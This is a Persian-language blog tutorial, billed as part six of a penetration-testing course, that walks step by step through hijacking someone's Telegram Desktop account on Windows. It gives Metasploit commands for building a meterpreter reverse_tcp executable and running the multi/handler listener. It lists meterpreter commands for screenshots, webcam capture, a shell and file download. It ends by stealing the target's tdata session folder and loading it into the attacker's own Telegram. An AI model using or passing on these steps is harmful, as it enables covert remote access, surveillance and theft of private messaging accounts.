آموزش تست نفوذ قسمت ششم

امینی 1395/1/12 5079

آموزش تست نفوذ قسمت ششم

با سلام درود فراوان خدمت شما دوستان گرامی
امینی هستم با جلسه 6 از سری آموزش های تست نفوذ مبحث امنیت تلگرام در سیستم عامل ویندوز خدمت شما .
جلسه قبلی تست نفوذ سیستم عامل اندروید با ابزار Metasploit در سیستم عامل کالی لینوکس را به شما عزیزان آموزش دادم .
 دسترسی گرفتن نسبت به ویندوز در حالت Exploiting مانند  اندروید است فقط در ساخت پیلود و نفوذ به تلگرام و البته سطح دسترسی باهم تفاوت دارند.
ابتدا چند روش برای ساخت پیلود ویندوز به شما اموزش میدهم که به دلخواه نسبت به ورژن کالی لینوکس خود می توانید استفاده کنید  . . .
 شایان ذکر است بهتر است پیلود با خوده ابزار msfconsole ساخته شود .

فرمان هارا نمی نویسم تا خودتان تایپ کنید و یاد بگیرید .

روش اول (تمام ورژن های کالی لینوکس ) : شما در این روش با استفاده از ابزار msfvenom پیلود خود را تولید می کنید

آموزش تست نفوذ

  msfvenom

روش دوم (ورژن های قبل از 2.0 ) : در این روش با استفاده از ابزار msfpayload پیلود خود را میسازیم .
می توان گفت msfpayload یکی از بهترین ابزار ها برای ساخت پیلود است و البته معروف ترین .
درست است بیس اصلی سورس ها باهم تفاوت ندارند اما در نحوه کرش باهم کمی فرق دارند

 برای مثال پیلود هایی که با msfpayload  برای سیستم عامل اندروید ساخته میشوند در ورژن 4.1.1 اندروید خیلی خوب جواب میدهند.
یکی از بزرگ ترین مشکلات این ابزار شناسایی خیلی سریع انتی ویروس ها نسبت به ان هستند .
اما این ابزار به علت قدیمی بودن در ورژن های جدید کالی مثل 2016 یا 2.0 حذف شده است .

آموزش تست نفوذ


  msfpayload


اما بریم سراغ msfconsole که روش پیشنهادی من است .
زمانی که شما پیلود را با خود msfconsole بسازید در اول سرعت خیلی بالایی دارد .
خیلی دقیق تر و بهتر عمل می کند .
اپشن هایی مختلفی نیز دارد . برای مثال شما میتوانید سورس پیلود خود را قبل از ساخت مشاهده کنید .
در جلسات بعدی بیشتر راجب ابزار generate و سوییچ های ان صحبت می کنیم .

اما این روش چون کمی با روش ها بالا فرق می کند دستورات را با توضیح عرض می کنم .

آموزش تست نفوذ

 msfconsole


ابتدا با فرمان msfconsole در ترمینال وارد متااسپلویت می شویم .

در قسمت اول باید پیلود خودمون را use کنیم برای این کار از فرمان

use payload/windows/meterpreter/reverse_tcp

استفاده می کنیم تا پیلود ما use شود .

حال نوبت به LHOST میرسد که باید ای پی خود را ست کنیم .

set LHOST IP

بعد از ان PORT که بهتر است 4444 باشد .

set LPORT 4444

نکته : با فرمان show options میتواینم مشخصات ست شده  را مشاهده کنیم

و در اخر با فرمان generate پیلود را میسازیم

generate -t exe -f name.exe

منظور از سوییچ -t فرمت است
و منظور از سوییچ -f اسم فایل و فرمت است
هم چنین با فرمان generate -h می توانید سوییچ های مختلف به علاوه ی کارایی ان هارا مشاهده کنید .
با این که در جلسه قبل راجب LHOST و شرایط ان کامل صحبت کردم ولی باز هم برای یاد اوری نکاتی را خدمت شما عزیزان عرض می کنم  .

دوستان باید توجه داشته باشید که اگر تارگت شما , با خوده شما در یک شبکه است باید از ای پی لوکال در هنگام ست کردن LHOST استفاده کنید .
برای بدست اوردن ای پی لوکال کافی است فرمان ifconfig را در ترمینال تایپ کنید .

اما اگر با شما در یک شبکه نیست باید ای پی پابلیک خود را وارد کنید که برای دریافت ان به گوگل رفته و my ip را وارد کنید .

شایان ذکر است اگر ای پی پابلیک خود را وارد کرده اید و تارگت شما در شبکه شما نیست باید در مودم خود تنظیمات ویژوال سرور را انجام دهید .
که در جلسه قبل کامل اموزش دادم .
و اگر مودم شما گزینه ی ویژوال سرور ندارد باید شبکه خود را روی حالت بریج قرار دهید .
خب دوستان دیگه باید یاد گرفته باشید که پیلود خودتون را بسازید .

بعد از ساخته شدن پیلود باید به حالت exploitng برویم .
تا وقتی تارگت ما پیلود را اجرا کرد به ما دسترسی داده شود تا بتوانیم کار هایی که نیاز داریم را انجام بدهیم .
رفتن به حالت Exploitng :
ابتدا وارد با فرمان msfconsole وارد متااسپلویت میشویم .

آموزش تست نفوذ

 Photo, Exploitng

بعد از وارد شدن به برنامه Metasploit با فرمان msfconsole
ابتدا باید اکسپلویت خود را یوز کنیم برای این کار از فرمان زیر استفاده می کنیم  :

use exploit/multi/handler

حال باید پیلود خود را ست کنیم :

use PAYLOAD windows/meterpreter/reverse_tcp

حال نوبت به ست کردن LHOST میرسد :

set LHOST X

حالا پورت را ست می کنیم :

set LPORT 4444

و در اخر اکسپلویت :

exploit
حال ما به روی حالت exploiting قرار گرفتیم و فقط کافی است تارگت پیلود مارا اجرا کند تا به ما دسترسی داده شود . . .
پس پیلود را اجرا می کنم


meterpreter

حالا که پیلود ران شد به ما دسترسی داده شد  بعد از گرفتن دسترسی meterpreter میتوانیم کامند های خودمون را روی سیستم عامل تارگت به اجرا در بیاریم .

چند دستور ساده برای شما میگم :

 دستور sysinfo مشخصات سیستم تارگت را به ما میدهد .

دستور screenshot به ما از صفحه تارگت اسکرین شات میدهد .

دستور ls فایل های موجود را نشان میدهد

دستور download فایل مورد نظر را از سیستم تارگت دانلود میکند

دستور help به ما فرمان ها و کاربرد ان هارا نشان میدهد

دستور webcam برای ما وب کم را باز می کند و یا از عکس میگرد و ارسال می کند . . .  

و اما دستور shell به سیستم تارگت شل تزریق می کند و دسترسی 100 مارا باز می کند .
دسترسی meterpreter به ما قابلیت های زیادی میدهد که شما میتوانید خودتان امتحان کنید و چون موضوع امروز ما تلگرام است من زیاد وارد مباحث فرعی نمیشوم
اما برای نفوذ به تلگرام ویندوز یک ما باید به مسیر

C:\Users\username\AppData\Roaming\Telegram Desktop

برویم وقتی وارد این فولدر بشویم فایلی به نام tdata وجود دارد که ما برای نفوذ به تلگرام به ان نیاز داریم . . .

محتوای این فولد کمی خواص است و البته پیچیده که لزوم به رمزگشایی اش نمی بینیم .

اما با دسترسی meterpreter که در حال حاضر از سیستم تارگت داریم به مسیر بالا میرویم .
بعد از وارد شدن به مسیر مورد نیاز با فرمان

آموزش تست نفوذ

download tdata

فایل tdata را دانلود می کنیم .

این فایل در مسیر home کالی لینوکس ذخیره میشود .

خب دوستان تقریبا کاره ما به پایان رسیده است و فقط کافی است در سیستم خودمون به مسیر بالا برویم و فایل tdata که دانلود کردیم را جایگزین ماله خودمون بکنیم و تلگرام را باز کنیم ,  با باز کردن تلگرام حساب تارگت برای باز میشود

قسمت بعدی قسمت قبلی